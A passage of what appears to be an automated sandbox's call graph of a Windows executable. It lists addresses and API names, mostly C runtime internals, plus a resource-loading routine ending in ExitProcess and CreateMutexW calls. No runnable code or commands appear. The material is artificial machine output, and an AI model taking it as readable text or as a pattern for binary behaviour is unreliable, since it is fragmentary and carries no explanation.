4032bf 10502->10507 10510 403e03 __freea 20 API calls 10502->10510 10519 40467c 10502->10519 10528 4032cc 10503->10528 10509 404649 _abort 11 API calls 10507->10509 10508 403e03 __freea 20 API calls 10508->10498 10511 4032cb 10509->10511 10510->10502 10513 403e7b 10512->10513 10517 403e4b _abort 10512->10517 10514 404831 __dosmaperr 20 API calls 10513->10514 10516 403e79 10514->10516 10515 403e66 RtlAllocateHeap 10515->10516 10515->10517 10516->10492 10517->10513 10517->10515 10518 4068fd _abort 7 API calls 10517->10518 10518->10517 10520 404689 10519->10520 10521 404697 10519->10521 10520->10521 10526 4046b0 10520->10526 10522 404831 __dosmaperr 20 API calls 10521->10522 10523 4046a1 10522->10523 10524 404639 _abort 26 API calls 10523->10524 10525 4046ab 10524->10525 10525->10502 10526->10525 10527 404831 __dosmaperr 20 API calls 10526->10527 10527->10523 10529 4032a3 10528->10529 10530 4032d9 10528->10530 10529->10508 10531 4032f0 10530->10531 10533 403e03 __freea 20 API calls 10530->10533 10532 403e03 __freea 20 API calls 10531->10532 10532->10529 10533->10530 10953 408c01 10954 408c25 10953->10954 10955 408c3e 10954->10955 10957 4099fb __startOneArgErrorHandling 10954->10957 10958 408c88 10955->10958 10961 4097e3 10955->10961 10960 409a3d __startOneArgErrorHandling 10957->10960 10971 409fd4 10957->10971 10962 409800 DecodePointer 10961->10962 10963 409810 10961->10963 10962->10963 10964 40989d 10963->10964 10967 409892 10963->10967 10969 409847 10963->10969 10964->10967 10968 404831 __dosmaperr 20 API calls 10964->10968 10965 4018cc _ValidateLocalCookies 5 API calls 10966 4099f7 10965->10966 10966->10958 10967->10965 10968->10967 10969->10967 10970 404831 __dosmaperr 20 API calls 10969->10970 10970->10967 10972 40a00d __startOneArgErrorHandling 10971->10972 10974 40a034 __startOneArgErrorHandling 10972->10974 10982 40a2a5 10972->10982 10975 40a077 10974->10975 10976 40a052 10974->10976 10995 40a596 10975->10995 10986 40a5c5 10976->10986 10979 40a072 __startOneArgErrorHandling 10980 4018cc _ValidateLocalCookies 5 API calls 10979->10980 10981 40a09b 10980->10981 10981->10960 10983 40a2d0 __raise_exc 10982->10983 10984 40a4c9 RaiseException 10983->10984 10985 40a4e1 10984->10985 10985->10974 10987 40a5d4 10986->10987 10988 40a648 __startOneArgErrorHandling 10987->10988 10989 40a5f3 __startOneArgErrorHandling 10987->10989 10991 40a596 __startOneArgErrorHandling 20 API calls 10988->10991 11002 402e1b 10989->11002 10994 40a641 10991->10994 10993 40a596 __startOneArgErrorHandling 20 API calls 10993->10994 10994->10979 10996 40a5a3 10995->10996 10997 40a5b8 10995->10997 10998 40a5bd 10996->10998 11000 404831 __dosmaperr 20 API calls 10996->11000 10999 404831 __dosmaperr 20 API calls 10997->10999 10998->10979 10999->10998 11001 40a5b0 11000->11001 11001->10979 11004 402e43 11002->11004 11003 4018cc _ValidateLocalCookies 5 API calls 11005 402e60 11003->11005 11004->11003 11005->10993 11005->10994 11245 4c70205 11246 4c7023e DispatchMessageW 11245->11246 11248 4c7027f 11246->11248 11417 407384 11427 407dbe 11417->11427 11421 407391 11440 40809a 11421->11440 11424 4073bb 11425 403e03 __freea 20 API calls 11424->11425 11426 4073c6 11425->11426 11444 407dc7 11427->11444 11429 40738c 11430 407ffa 11429->11430 11431 408006 ___scrt_is_nonwritable_in_current_image 11430->11431 11464 405656 EnterCriticalSection 11431->11464 11433 40807c 11478 408091 11433->11478 11434 408011 11434->11433 11436 408050 DeleteCriticalSection 11434->11436 11465 408e2c 11434->11465 11439 403e03 __freea 20 API calls 11436->11439 11437 408088 ___scrt_is_nonwritable_in_current_image 11437->11421 11439->11434 11441 4080b0 11440->11441 11442 4073a0 DeleteCriticalSection 11440->11442 11441->11442 11443 403e03 __freea 20 API calls 11441->11443 11442->11421 11442->11424 11443->11442 11445 407dd3 ___scrt_is_nonwritable_in_current_image 11444->11445 11454 405656 EnterCriticalSection 11445->11454 11447 407e76 11459 407e96 11447->11459 11450 407e82 ___scrt_is_nonwritable_in_current_image 11450->11429 11452 407d77 66 API calls 11453 407de2 11452->11453 11453->11447 11453->11452 11455 4073d0 EnterCriticalSection 11453->11455 11456 407e6c 11453->11456 11454->11453 11455->11453 11462 4073e4 LeaveCriticalSection 11456->11462 11458 407e74 11458->11453 11463 40569e LeaveCriticalSection 11459->11463 11461 407e9d 11461->11450 11462->11458 11463->11461 11464->11434 11466 408e38 ___scrt_is_nonwritable_in_current_image 11465->11466 11467 408e49 11466->11467 11468 408e5e 11466->11468 11469 404831 __dosmaperr 20 API calls 11467->11469 11477 408e59 ___scrt_is_nonwritable_in_current_image 11468->11477 11481 4073d0 EnterCriticalSection 11468->11481 11470 408e4e 11469->11470 11472 404639 _abort 26 API calls 11470->11472 11472->11477 11473 408e7a 11482 408db6 11473->11482 11475 408e85 11498 408ea2 11475->11498 11477->11434 11746 40569e LeaveCriticalSection 11478->11746 11480 408098 11480->11437 11481->11473 11483 408dc3 11482->11483 11484 408dd8 11482->11484 11485 404831 __dosmaperr 20 API calls 11483->11485 11490 408dd3 11484->11490 11501 407d11 11484->11501 11487 408dc8 11485->11487 11489 404639 _abort 26 API calls 11487->11489 11489->11490 11490->11475 11491 40809a 20 API calls 11492 408df4 11491->11492 11507 407296 11492->11507 11494 408dfa 11514 409b5e 11494->11514 11497 403e03 __freea 20 API calls 11497->11490 11745 4073e4 LeaveCriticalSection 11498->11745 11500 408eaa 11500->11477 11502 407d29 11501->11502 11503 407d25 11501->11503 11502->11503 11504 407296 26 API calls 11502->11504 11503->11491 11505 407d49 11504->11505 11529 4087b3 11505->11529 11508 4072a2 11507->11508 11509 4072b7 11507->11509 11510 404831 __dosmaperr 20 API calls 11508->11510 11509->11494 11511 4072a7 11510->11511 11512 404639 _abort 26 API calls 11511->11512 11513 4072b2 11512->11513 11513->11494 11515 409b6d 11514->11515 11519 409b82 11514->11519 11517 40481e __dosmaperr 20 API calls 11515->11517 11516 409bbd 11520 40481e __dosmaperr 20 API calls 11516->11520 11518 409b72 11517->11518 11521 404831 __dosmaperr 20 API calls 11518->11521 11519->11516 11522 409ba9 11519->11522 11523 409bc2 11520->11523 11526 408e00 11521->11526 11702 409b36 11522->11702 11525 404831 __dosmaperr 20 API calls 11523->11525 11527 409bca 11525->11527 11526->11490 11526->11497 11528 404639 _abort 26 API calls 11527->11528 11528->11526 11530 4087bf ___scrt_is_nonwritable_in_current_image 11529->11530 11531 4087c7 11530->11531 11532 4087df 11530->11532 11554 40481e 11531->11554 11534 40887d 11532->11534 11538 408814 11532->11538 11536 40481e __dosmaperr 20 API calls 11534->11536 11539 408882 11536->11539 11537 404831 __dosmaperr 20 API calls 11549 4087d4 ___scrt_is_nonwritable_in_current_image 11537->11549 11557 405c97 EnterCriticalSection 11538->11557 11541 404831 __dosmaperr 20 API calls 11539->11541 11543 40888a 11541->11543 11542 40881a 11544 408836 11542->11544 11545 40884b 11542->11545 11546 404639 _abort 26 API calls 11543->11546 11548 404831 __dosmaperr 20 API calls 11544->11548 11558 40889e 11545->11558 11546->11549 11551 40883b 11548->11551 11549->11503 11550 408846 11609 408875 11550->11609 11552 40481e __dosmaperr 20 API calls 11551->11552 11552->11550 11555 4043a4 _abort 20 API calls 11554->11555 11556 404823 11555->11556 11556->11537 11557->11542 11559 4088cc 11558->11559 11605 4088c5 11558->11605 11560 4088d0 11559->11560 11561 4088ef 11559->11561 11563 40481e __dosmaperr 20 API calls 11560->11563 11564 408940 11561->11564 11565 408923 11561->11565 11562 4018cc _ValidateLocalCookies 5 API calls 11566 408aa6 11562->11566 11567 4088d5 11563->11567 11570 408956 11564->11570 11612 408d9b 11564->11612 11568 40481e __dosmaperr 20 API calls 11565->11568 11566->11550 11569 404831 __dosmaperr 20 API calls 11567->11569 11571 408928 11568->11571 11572 4088dc 11569->11572 11615 408443 11570->11615 11575 404831 __dosmaperr 20 API calls 11571->11575 11576 404639 _abort 26 API calls 11572->11576 11578 408930 11575->11578 11576->11605 11583 404639 _abort 26 API calls 11578->11583 11579 408964 11581 408968 11579->11581 11582 40898a 11579->11582 11580 40899d 11584 4089b1 11580->11584 11585 4089f7 WriteFile 11580->11585 11599 408a5e 11581->11599 11622 4083d6 11581->11622 11627 408223 GetConsoleCP 11582->11627 11583->11605 11588 4089e7 11584->11588 11589 4089b9 11584->11589 11587 408a1a GetLastError 11585->11587 11594 408980 11585->11594 11587->11594 11653 4084b9 11588->11653 11592 4089d7 11589->11592 11596 4089be 11589->11596 11645 408686 11592->11645 11598 408a3a 11594->11598 11594->11599 11594->11605 11595 404831 __dosmaperr 20 API calls 11597 408a83 11595->11597 11596->11599 11638 408598 11596->11638 11601 40481e __dosmaperr 20 API calls 11597->11601 11602 408a41 11598->11602 11603 408a55 11598->11603 11599->11595 11599->11605 11601->11605 11606 404831 __dosmaperr 20 API calls 11602->11606 11660 4047fb 11603->11660 11605->11562 11607 408a46 11606->11607 11608 40481e __dosmaperr 20 API calls 11607->11608 11608->11605 11701 405cba LeaveCriticalSection 11609->11701 11611 40887b 11611->11549 11665 408d1d 11612->11665 11687 407cbb 11615->11687 11617 408453 11618 408458 11617->11618 11619 404320 _abort 38 API calls 11617->11619 11618->11579 11618->11580 11620 40847b 11619->11620 11620->11618 11621 408499 GetConsoleMode 11620->11621 11621->11618 11623 408430 11622->11623 11626 4083fb 11622->11626 11623->11594 11624 408f11 WriteConsoleW CreateFileW 11624->11626 11625 408432 GetLastError 11625->11623 11626->11623 11626->11624 11626->11625 11632 408286 11627->11632 11637 408398 11627->11637 11628 4018cc _ValidateLocalCookies 5 API calls 11629 4083d2 11628->11629 11629->11594 11631 407222 40 API calls __fassign 11631->11632 11632->11631 11633 40830c WideCharToMultiByte 11632->11633 11636 408363 WriteFile 11632->11636 11632->11637 11696 405fc6 11632->11696 11634 408332 WriteFile 11633->11634 11633->11637 11634->11632 11635 4083bb GetLastError 11634->11635 11635->11637 11636->11632 11636->11635 11637->11628 11639 4085a7 11638->11639 11640 408669 11639->11640 11642 408625 WriteFile 11639->11642 11641 4018cc _ValidateLocalCookies 5 API calls 11640->11641 11643 408682 11641->11643 11642->11639 11644 40866b GetLastError 11642->11644 11643->11594 11644->11640 11648 408695 11645->11648 11646 4087a0 11647 4018cc _ValidateLocalCookies 5 API calls 11646->11647 11649 4087af 11647->11649 11648->11646 11650 408717 WideCharToMultiByte 11648->11650 11652 40874c WriteFile 11648->11652 11649->11594 11651 408798 GetLastError 11650->11651 11650->11652 11651->11646 11652->11648 11652->11651 11658 4084c8 11653->11658 11654 40857b 11656 4018cc _ValidateLocalCookies 5 API calls 11654->11656 11655 40853a WriteFile 11655->11658 11659 40857d GetLastError 11655->11659 11657 408594 11656->11657 11657->11594 11658->11654 11658->11655 11659->11654 11661 40481e __dosmaperr 20 API calls 11660->11661 11662 404806 __dosmaperr 11661->11662 11663 404831 __dosmaperr 20 API calls 11662->11663 11664 404819 11663->11664 11664->11605 11674 405d6e 11665->11674 11667 408d2f 11668 408d37 11667->11668 11669 408d48 SetFilePointerEx 11667->11669 11670 404831 __dosmaperr 20 API calls 11668->11670 11671 408d60 GetLastError 11669->11671 11672 408d3c 11669->11672 11670->11672 11673 4047fb __dosmaperr 20 API calls 11671->11673 11672->11570 11673->11672 11675 405d7b 11674->11675 11679 405d90 11674->11679 11676 40481e __dosmaperr 20 API calls 11675->11676 11678 405d80 11676->11678 11677 40481e __dosmaperr 20 API calls 11681 405dc0 11677->11681 11682 404831 __dosmaperr 20 API calls 11678->11682 11679->11677 11680 405db5 11679->11680 11680->11667 11683 404831 __dosmaperr 20 API calls 11681->11683 11684 405d88 11682->11684 11685 405dc8 11683->11685 11684->11667 11686 404639 _abort 26 API calls 11685->11686 11686->11684 11688 407cd5 11687->11688 11689 407cc8 11687->11689 11692 407ce1 11688->11692 11693 404831 __dosmaperr 20 API calls 11688->11693 11690 404831 __dosmaperr 20 API calls 11689->11690 11691 407ccd 11690->11691 11691->11617 11692->11617 11694 407d02 11693->11694 11695 404639 _abort 26 API calls 11694->11695 11695->11691 11697 404320 _abort 38 API calls 11696->11697 11698 405fd1 11697->11698 11699 40723c __fassign 38 API calls 11698->11699 11700 405fe1 11699->11700 11700->11632 11701->11611 11705 409ab4 11702->11705 11704 409b5a 11704->11526 11706 409ac0 ___scrt_is_nonwritable_in_current_image 11705->11706 11716 405c97 EnterCriticalSection 11706->11716 11708 409ace 11709 409b00 11708->11709 11710 409af5 11708->11710 11712 404831 __dosmaperr 20 API calls 11709->11712 11717 409bdd 11710->11717 11713 409afb 11712->11713 11732 409b2a 11713->11732 11715 409b1d ___scrt_is_nonwritable_in_current_image 11715->11704 11716->11708 11718 405d6e 26 API calls 11717->11718 11719 409bed 11718->11719 11720 409bf3 11719->11720 11724 405d6e 26 API calls 11719->11724 11731 409c25 11719->11731 11735 405cdd 11720->11735 11722 405d6e 26 API calls 11725 409c31 CloseHandle 11722->11725 11727 409c1c 11724->11727 11725->11720 11728 409c3d GetLastError 11725->11728 11726 409c6d 11726->11713 11730 405d6e 26 API calls 11727->11730 11728->11720 11729 4047fb __dosmaperr 20 API calls 11729->11726 11730->11731 11731->11720 11731->11722 11744 405cba LeaveCriticalSection 11732->11744 11734 409b34 11734->11715 11736 405d53 11735->11736 11737 405cec 11735->11737 11738 404831 __dosmaperr 20 API calls 11736->11738 11737->11736 11741 405d16 11737->11741 11739 405d58 11738->11739 11740 40481e __dosmaperr 20 API calls 11739->11740 11742 405d43 11740->11742 11741->11742 11743 405d3d SetStdHandle 11741->11743 11742->11726 11742->11729 11743->11742 11744->11734 11745->11500 11746->11480 11006 40420b 11007 404216 11006->11007 11008 404226 11006->11008 11012 40422c 11007->11012 11011 403e03 __freea 20 API calls 11011->11008 11013 404245 11012->11013 11014 40423f 11012->11014 11016 403e03 __freea 20 API calls 11013->11016 11015 403e03 __freea 20 API calls 11014->11015 11015->11013 11017 404251 11016->11017 11018 403e03 __freea 20 API calls 11017->11018 11019 40425c 11018->11019 11020 403e03 __freea 20 API calls 11019->11020 11021 404267 11020->11021 11022 403e03 __freea 20 API calls 11021->11022 11023 404272 11022->11023 11024 403e03 __freea 20 API calls 11023->11024 11025 40427d 11024->11025 11026 403e03 __freea 20 API calls 11025->11026 11027 404288 11026->11027 11028 403e03 __freea 20 API calls 11027->11028 11029 404293 11028->11029 11030 403e03 __freea 20 API calls 11029->11030 11031 40429e 11030->11031 11032 403e03 __freea 20 API calls 11031->11032 11033 4042ac 11032->11033 11038 4040f2 11033->11038 11044 403ffe 11038->11044 11040 404116 11041 404142 11040->11041 11057 40405f 11041->11057 11043 404166 11043->11011 11045 40400a ___scrt_is_nonwritable_in_current_image 11044->11045 11052 405656 EnterCriticalSection 11045->11052 11047 40403e 11053 404053 11047->11053 11048 404014 11048->11047 11051 403e03 __freea 20 API calls 11048->11051 11050 40404b ___scrt_is_nonwritable_in_current_image 11050->11040 11051->11047 11052->11048 11056 40569e LeaveCriticalSection 11053->11056 11055 40405d 11055->11050 11056->11055 11058 40406b ___scrt_is_nonwritable_in_current_image 11057->11058 11065 405656 EnterCriticalSection 11058->11065 11060 404075 11061 4042d5 _abort 20 API calls 11060->11061 11062 404088 11061->11062 11066 40409e 11062->11066 11064 404096 ___scrt_is_nonwritable_in_current_image 11064->11043 11065->11060 11069 40569e LeaveCriticalSection 11066->11069 11068 4040a8 11068->11064 11069->11068 11249 40188b 11252 401b74 11249->11252 11251 401890 11251->11251 11253 401ba4 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11252->11253 11254 401b97 11252->11254 11255 401b9b 11253->11255 11254->11253 11254->11255 11255->11251 10453 4c70508 10456 4c7049f CreateMutexW 10453->10456 10457 4c70514 10453->10457 10455 4c704b9 10456->10455 11070 406810 11073 406832 11070->11073 11071 4018cc _ValidateLocalCookies 5 API calls 11072 406898 11071->11072 11073->11071 11383 402b10 RtlUnwind 10458 401711 10463 401e1d SetUnhandledExceptionFilter 10458->10463 10460 401716 _com_raise_error 10464 40382f 10460->10464 10462 401721 10463->10460 10465 403855 10464->10465 10466 40383b 10464->10466 10465->10462 10466->10465 10467 404831 __dosmaperr 20 API calls 10466->10467 10468 403845 10467->10468 10469 404639 _abort 26 API calls 10468->10469 10470 403850 10469->10470 10470->10462 11256 4c70416 11259 4c7043e CreateMutexW 11256->11259 11258 4c704b9 11259->11258 11074 405615 11076 405620 11074->11076 11077 405649 11076->11077 11078 405645 11076->11078 11080 405927 11076->11080 11087 40566d 11077->11087 11081 4056b5 _abort 5 API calls 11080->11081 11082 40594e 11081->11082 11083 40596c InitializeCriticalSectionAndSpinCount 11082->11083 11086 405957 11082->11086 11083->11086 11084 4018cc _ValidateLocalCookies 5 API calls 11085 405983 11084->11085 11085->11076 11086->11084 11088 405699 11087->11088 11089 40567a 11087->11089 11088->11078 11090 405684 DeleteCriticalSection 11089->11090 11090->11088 11090->11090 11384 405b1a 11385 405b4b 11384->11385 11387 405b25 11384->11387 11386 405b35 FreeLibrary 11386->11387 11387->11385 11387->11386 11747 405f9a 11748 405f9f 11747->11748 11749 405fc2 11748->11749 11751 405bca 11748->11751 11752 405bd7 11751->11752 11753 405bf9 11751->11753 11754 405bf3 11752->11754 11755 405be5 DeleteCriticalSection 11752->11755 11753->11748 11756 403e03 __freea 20 API calls 11754->11756 11755->11754 11755->11755 11756->11753 11260 4026a0 11261 4026b2 11260->11261 11263 4026c0 @_EH4_CallFilterFunc@8 11260->11263 11262 4018cc _ValidateLocalCookies 5 API calls 11261->11262 11262->11263 11264 404ca2 11269 404cd7 11264->11269 11267 404cbe 11268 403e03 __freea 20 API calls 11268->11267 11270 404cb0 11269->11270 11271 404ce9 11269->11271 11270->11267 11270->11268 11272 404d19 11271->11272 11273 404cee 11271->11273 11272->11270 11275 406786 __onexit 29 API calls 11272->11275 11274 403ece _abort 20 API calls 11273->11274 11276 404cf7 11274->11276 11278 404d34 11275->11278 11277 403e03 __freea 20 API calls 11276->11277 11277->11270 11279 403e03 __freea 20 API calls 11278->11279 11279->11270 9868 401723 9869 40172f ___scrt_is_nonwritable_in_current_image 9868->9869 9893 401985 9869->9893 9871 401736 9873 40175f 9871->9873 9922 401c88 IsProcessorFeaturePresent 9871->9922 9874 40179e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 9873->9874 9904 403480 9873->9904 9879 4017fe 9874->9879 9926 4036df 9874->9926 9878 40177e ___scrt_is_nonwritable_in_current_image 9912 401da3 9879->9912 9881 401804 9916 401489 GetModuleHandleW FindResourceW 9881->9916 9894 40198e 9893->9894 9937 40208d IsProcessorFeaturePresent 9894->9937 9898 40199f 9899 4019a3 9898->9899 9948 403d3f 9898->9948 9899->9871 9902 4019ba 9902->9871 9907 403497 9904->9907 9905 4018cc _ValidateLocalCookies 5 API calls 9906 401778 9905->9906 9906->9878 9908 403424 9906->9908 9907->9905 9909 403453 9908->9909 9910 4018cc _ValidateLocalCookies 5 API calls 9909->9910 9911 40347c 9910->9911 9911->9874 10030 402460 9912->10030 9915 401dc9 9915->9881 9917 4014ab GetModuleHandleW LoadResource 9916->9917 9918 4014ec ExitProcess 9916->9918 9919 4014e5 FreeResource 9917->9919 9920 4014bd LockResource GetModuleHandleW SizeofResource 9917->9920 9919->9918 9920->9919 9921 4014da 9920->9921 9921->9919 9923 401c9e ___scrt_get_show_window_mode 9922->9923 9924 401d46 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9923->9924 9925 401d90 9924->9925 9925->9871 9927 403707 _com_raise_error _abort 9926->9927 9927->9879 10032 404320 GetLastError 9927->10032 9931 403dd3 10052 403e8b 9931->10052 9938 40199a 9937->9938 9939 4025ba 9938->9939 9940 4025bf ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 9939->9940 9959 4027d9 9940->9959 9943 4025cd 9943->9898 9945 4025d5 9946 4025e0 9945->9946 9973 402815 9945->9973 9946->9898 10014 406819 9948->10014 9951 4025e3 9952 4025ec 9951->9952 9953 4025fd 9951->9953 9954 4027be ___vcrt_uninitialize_ptd 6 API calls 9952->9954 9953->9899 9955 4025f1 9954->9955 9956 402815 ___vcrt_uninitialize_locks DeleteCriticalSection 9955->9956 9957 4025f6 9956->9957 10026 402ab3 9957->10026 9960 4027e2 9959->9960 9962 40280b 9960->9962 9963 4025c9 9960->9963 9977 402a33 9960->9977 9964 402815 ___vcrt_uninitialize_locks DeleteCriticalSection 9962->9964 9963->9943 9965 40278b 9963->9965 9964->9963 9995 402982 9965->9995 9967 402795 9968 4027a0 9967->9968 10000 4029f6 9967->10000 9968->9945 9970 4027ae 9971 4027bb 9970->9971 10005 4027be 9970->10005 9971->9945 9974 40283f 9973->9974 9975 402820 9973->9975 9974->9943 9976 40282a DeleteCriticalSection 9975->9976 9976->9974 9976->9976 9982 402861 9977->9982 9979 402a4d 9980 402a6a InitializeCriticalSectionAndSpinCount 9979->9980 9981 402a56 9979->9981 9980->9981 9981->9960 9985 402891 9982->9985 9987 402895 __crt_fast_encode_pointer 9982->9987 9983 4028b5 9986 4028c1 GetProcAddress 9983->9986 9983->9987 9985->9983 9985->9987 9988 402901 9985->9988 9986->9987 9987->9979 9989 402929 LoadLibraryExW 9988->9989 9990 40291e 9988->9990 9991 402945 GetLastError 9989->9991 9994 40295d 9989->9994 9990->9985 9992 402950 LoadLibraryExW 9991->9992 9991->9994 9992->9994 9993 402974 FreeLibrary 9993->9990 9994->9990 9994->9993 9996 402861 try_get_function 5 API calls 9995->9996 9997 40299c 9996->9997 9998 4029b4 TlsAlloc 9997->9998 9999 4029a5 9997->9999 9999->9967 10001 402861 try_get_function 5 API calls 10000->10001 10002 402a10 10001->10002 10003 402a2a TlsSetValue 10002->10003 10004 402a1f 10002->10004 10003->10004 10004->9970 10006 4027ce 10005->10006 10007 4027c8 10005->10007 10006->9968 10009 4029bc 10007->10009 10010 402861 try_get_function 5 API calls 10009->10010 10011 4029d6 10010->10011 10012 4029ed TlsFree 10011->10012 10013 4029e2 10011->10013 10012->10013 10013->10006 10015 406832 10014->10015 10018 4018cc 10015->10018 10017 4019ac 10017->9902 10017->9951 10019 4018d5 10018->10019 10020 4018d7 IsProcessorFeaturePresent 10018->10020 10019->10017 10022 401f6c 10020->10022 10025 401f30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10022->10025 10024 40204f 10024->10017 10025->10024 10027 402ae2 10026->10027 10028 402abc 10026->10028 10027->9953 10028->10027 10029 402acc FreeLibrary 10028->10029 10029->10028 10031 401db6 GetStartupInfoW 10030->10031 10031->9915 10033 40433c 10032->10033 10034 404336 10032->10034 10038 40438b SetLastError 10033->10038 10070 403ece 10033->10070 10063 405878 10034->10063 10038->9931 10039 404356 10077 403e03 10039->10077 10043 40435c 10045 404397 SetLastError 10043->10045 10044 404372 10090 404192 10044->10090 10048 403e8b _abort 35 API calls 10045->10048 10050 4043a3 10048->10050 10049 403e03 __freea 20 API calls 10051 404384 10049->10051 10051->10038 10051->10045 10294 406a7f 10052->10294 10056 403ea5 IsProcessorFeaturePresent 10059 403eb0 10056->10059 10058 403e9b 10058->10056 10062 403ec3 10058->10062 10324 40446f 10059->10324 10330 4036c9 10062->10330 10095 4056b5 10063->10095 10065 40589f 10066 4058b7 TlsGetValue 10065->10066 10067 4058ab 10065->10067 10066->10067 10068 4018cc _ValidateLocalCookies 5 API calls 10067->10068 10069 4058c8 10068->10069 10069->10033 10075 403edb _abort 10070->10075 10071 403f1b 10113 404831 10071->10113 10072 403f06 HeapAlloc 10073 403f19 10072->10073 10072->10075 10073->10039 10083 4058ce 10073->10083 10075->10071 10075->10072 10108 4068fd 10075->10108 10078 403e0e HeapFree 10077->10078 10082 403e37 __dosmaperr 10077->10082 10079 403e23 10078->10079 10078->10082 10080 404831 __dosmaperr 18 API calls 10079->10080 10081 403e29 GetLastError 10080->10081 10081->10082 10082->10043 10084 4056b5 _abort 5 API calls 10083->10084 10085 4058f5 10084->10085 10086 405910 TlsSetValue 10085->10086 10087 405904 10085->10087 10086->10087 10088 4018cc _ValidateLocalCookies 5 API calls 10087->10088 10089 40436b 10088->10089 10089->10039 10089->10044 10146 40416a 10090->10146 10098 4056e1 10095->10098 10100 4056e5 __crt_fast_encode_pointer 10095->10100 10096 405705 10099 405711 GetProcAddress 10096->10099 10096->10100 10098->10096 10098->10100 10101 405751 10098->10101 10099->10100 10100->10065 10102 405772 LoadLibraryExW 10101->10102 10107 405767 10101->10107 10103 40578f GetLastError 10102->10103 10106 4057a7 10102->10106 10105 40579a LoadLibraryExW 10103->10105 10103->10106 10104 4057be FreeLibrary 10104->10107 10105->10106 10106->10104 10106->10107 10107->10098 10116 406941 10108->10116 10110 4018cc _ValidateLocalCookies 5 API calls 10111 40693d 10110->10111 10111->10075 10112 406913 10112->10110 10127 4043a4 GetLastError 10113->10127 10117 40694d ___scrt_is_nonwritable_in_current_image 10116->10117 10122 405656 EnterCriticalSection 10117->10122 10119 406958 10123 40698a 10119->10123 10121 40697f ___scrt_is_nonwritable_in_current_image 10121->10112 10122->10119 10126 40569e LeaveCriticalSection 10123->10126 10125 406991 10125->10121 10126->10125 10128 4043c3 10127->10128 10129 4043bd 10127->10129 10131 403ece _abort 17 API calls 10128->10131 10133 40441a SetLastError 10128->10133 10130 405878 _abort 11 API calls 10129->10130 10130->10128 10132 4043d5 10131->10132 10134 4058ce _abort 11 API calls 10132->10134 10139 4043dd 10132->10139 10135 404423 10133->10135 10137 4043f2 10134->10137 10135->10073 10136 403e03 __freea 17 API calls 10138 4043e3 10136->10138 10137->10139 10140 4043f9 10137->10140 10141 404411 SetLastError 10138->10141 10139->10136 10142 404192 _abort 17 API calls 10140->10142 10141->10135 10143 404404 10142->10143 10144 403e03 __freea 17 API calls 10143->10144 10145 40440a 10144->10145 10145->10133 10145->10141 10152 4040aa 10146->10152 10148 40418e 10149 40411a 10148->10149 10163 403fae 10149->10163 10151 40413e 10151->10049 10153 4040b6 ___scrt_is_nonwritable_in_current_image 10152->10153 10158 405656 EnterCriticalSection 10153->10158 10155 4040c0 10159 4040e6 10155->10159 10157 4040de ___scrt_is_nonwritable_in_current_image 10157->10148 10158->10155 10162 40569e LeaveCriticalSection 10159->10162 10161 4040f0 10161->10157 10162->10161 10164 403fba ___scrt_is_nonwritable_in_current_image 10163->10164 10171 405656 EnterCriticalSection 10164->10171 10166 403fc4 10172 4042d5 10166->10172 10168 403fdc 10176 403ff2 10168->10176 10170 403fea ___scrt_is_nonwritable_in_current_image 10170->10151 10171->10166 10173 40430b __fassign 10172->10173 10174 4042e4 __fassign 10172->10174 10173->10168 10174->10173 10179 406472 10174->10179 10293 40569e LeaveCriticalSection 10176->10293 10178 403ffc 10178->10170 10181 4064f2 10179->10181 10182 406488 10179->10182 10183 403e03 __freea 20 API calls 10181->10183 10206 406540 10181->10206 10182->10181 10187 403e03 __freea 20 API calls 10182->10187 10189 4064bb 10182->10189 10184 406514 10183->10184 10185 403e03 __freea 20 API calls 10184->10185 10190 406527 10185->10190 10186 403e03 __freea 20 API calls 10191 4064e7 10186->10191 10193 4064b0 10187->10193 10188 40654e 10192 4065ae 10188->10192 10201 403e03 20 API calls __freea 10188->10201 10194 403e03 __freea 20 API calls 10189->10194 10205 4064dd 10189->10205 10195 403e03 __freea 20 API calls 10190->10195 10196 403e03 __freea 20 API calls 10191->10196 10197 403e03 __freea 20 API calls 10192->10197 10207 405fec 10193->10207 10199 4064d2 10194->10199 10200 406535 10195->10200 10196->10181 10202 4065b4 10197->10202 10235 4060ea 10199->10235 10204 403e03 __freea 20 API calls 10200->10204 10201->10188 10202->10173 10204->10206 10205->10186 10247 4065e5 10206->10247 10208 4060e6 10207->10208 10209 405ffd 10207->10209 10208->10189 10210 40600e 10209->10210 10212 403e03 __freea 20 API calls 10209->10212 10211 406020 10210->10211 10213 403e03 __freea 20 API calls 10210->10213 10214 406032 10211->10214 10215 403e03 __freea 20 API calls 10211->10215 10212->10210 10213->10211 10216 406044 10214->10216 10217 403e03 __freea 20 API calls 10214->10217 10215->10214 10218 406056 10216->10218 10220 403e03 __freea 20 API calls 10216->10220 10217->10216 10219 406068 10218->10219 10221 403e03 __freea 20 API calls 10218->10221 10222 40607a 10219->10222 10223 403e03 __freea 20 API calls 10219->10223 10220->10218 10221->10219 10224 40608c 10222->10224 10225 403e03 __freea 20 API calls 10222->10225 10223->10222 10226 40609e 10224->10226 10228 403e03 __freea 20 API calls 10224->10228 10225->10224 10227 4060b0 10226->10227 10229 403e03 __freea 20 API calls 10226->10229 10230 4060c2 10227->10230 10231 403e03 __freea 20 API calls 10227->10231 10228->10226 10229->10227 10232 4060d4 10230->10232 10233 403e03 __freea 20 API calls 10230->10233 10231->10230 10232->10208 10234 403e03 __freea 20 API calls 10232->10234 10233->10232 10234->10208 10236 4060f7 10235->10236 10246 40614f 10235->10246 10237 406107 10236->10237 10238 403e03 __freea 20 API calls 10236->10238 10239 403e03 __freea 20 API calls 10237->10239 10242 406119 10237->10242 10238->10237 10239->10242 10240 40612b 10241 40613d 10240->10241 10244 403e03 __freea 20 API calls 10240->10244 10245 403e03 __freea 20 API calls 10241->10245 10241->10246 10242->10240 10243 403e03 __freea 20 API calls 10242->10243 10243->10240 10244->10241 10245->10246 10246->10205 10248 4065f2 10247->10248 10252 406610 10247->10252 10248->10252 10253 40618f 10248->10253 10251 403e03 __freea 20 API calls 10251->10252 10252->10188 10254 40626d 10253->10254 10255 4061a0 10253->10255 10254->10251 10289 406153 10255->10289 10258 406153 __fassign 20 API calls 10259 4061b3 10258->10259 10260 406153 __fassign 20 API calls 10259->10260 10261 4061be 10260->10261 10262 406153 __fassign 20 API calls 10261->10262 10263 4061c9 10262->10263 10264 406153 